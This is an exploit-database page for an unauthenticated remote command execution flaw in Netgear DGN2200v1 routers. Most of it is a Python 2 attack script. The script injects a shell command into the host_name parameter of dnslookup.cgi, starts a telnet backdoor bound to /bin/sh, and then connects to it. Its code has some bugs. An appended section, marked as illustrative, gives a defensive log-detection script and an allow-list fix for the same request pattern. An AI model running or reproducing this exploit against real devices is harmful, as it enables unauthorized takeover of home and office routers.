Netgear DGN2200v1 Remote Command Execution

2021.07.07
Credit: SivertPL
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)
# Date: 02.07.2021
# Exploit Author: SivertPL
# Vendor Homepage: https://www.netgear.com/
# Version: All prior to v1.0.0.60

#!/usr/bin/python

"""
NETGEAR DGN2200v1 Unauthenticated Remote Command Execution

Author: SivertPL (kroppoloe@protonmail.ch)
Date: 02.07.2021
Status: Patched in some models
Version: All prior to v1.0.0.60
Impact: Critical

CVE: No CVE number assigned
PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365

References:
    1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
    2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1

The exploit script only works on UNIX-based systems.

This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past.
This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol.
"""

import sys
import requests
import os

target_ip = "192.168.0.1"
telnet_port = 666
sent = False

def main():
    if len(sys.argv) < 3:
        print "./dgn2200_pwn.py <router ip> <backdoor-port>"
        exit()

    target_ip = sys.argv[1]
    telnet_port = int(sys.argv[2])
    print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..."
    send_payload()
    print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..."
    print "[!] If it fails to connect it means the target is probably not vulnerable"
    spawn_shell()

def send_payload():
    try:
        requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true")
        sent = True
    except Exception:
        sent = False
        print "[-] Unknown error, target might not be vulnerable."

def spawn_shell():
    if sent:
        print "[+] Dropping a shell..."
        os.system("telnet " + target_ip + " " + telnet_port)
    else:
        exit()

if __name__ == "__main__":
    main()
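
Detection sketch for the request pattern above, added here as an example and not part of the original exploit or of any Netgear code: it flags requests to dnslookup.cgi whose host_name parameter, once percent-decoded, is anything other than a plain hostname. The common-log-format input (for instance from a proxy in front of the device), the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(r"(?=.{1,253}\Z)%s(?:\.%s)*\.?\Z" % (_LABEL, _LABEL))
REQUEST_RE = re.compile(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (common log format); the command text is a placeholder.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Jul/2021:10:00:01 +0000] "GET /dnslookup.cgi?host_name=www.example.com&lookup=Lookup HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Jul/2021:10:00:05 +0000] "GET /dnslookup.cgi?host_name=www.example.com%3B%20PLACEHOLDER-COMMAND&lookup=Lookup&ess_=true HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Jul/2021:10:00:09 +0000] "GET /dnslookup.cgi?host_name=www.example.com;PLACEHOLDER&lookup=Lookup HTTP/1.1" 200 498',
    '192.0.2.10 - - [02/Jul/2021:10:00:12 +0000] "GET /index.htm HTTP/1.1" 200 1024',
]


def is_plain_hostname(value):
    """True only if value is a syntactically valid hostname and nothing else."""
    return bool(HOSTNAME_RE.match(value))


def host_name_values(query):
    """Yield every percent-decoded host_name value in a raw query string."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "host_name":
            yield unquote_plus(value)


def suspicious_dnslookup_requests(log_lines):
    """Return (client, decoded host_name) for dnslookup.cgi requests whose
    host_name parameter is anything other than a plain hostname."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/dnslookup.cgi"):
            continue
        hits.extend((client, v) for v in host_name_values(url.query)
                    if not is_plain_hostname(v))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_dnslookup_requests(SAMPLE_LOG):
        print("ALERT %s sent host_name=%r" % (client, value))
```

The same allow-list check is the CWE-78 mitigation on the server side: a handler that rejects any host_name failing is_plain_hostname before building a command line never passes shell metacharacters to the shell.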


Copyright 2021, cxsecurity.com

 
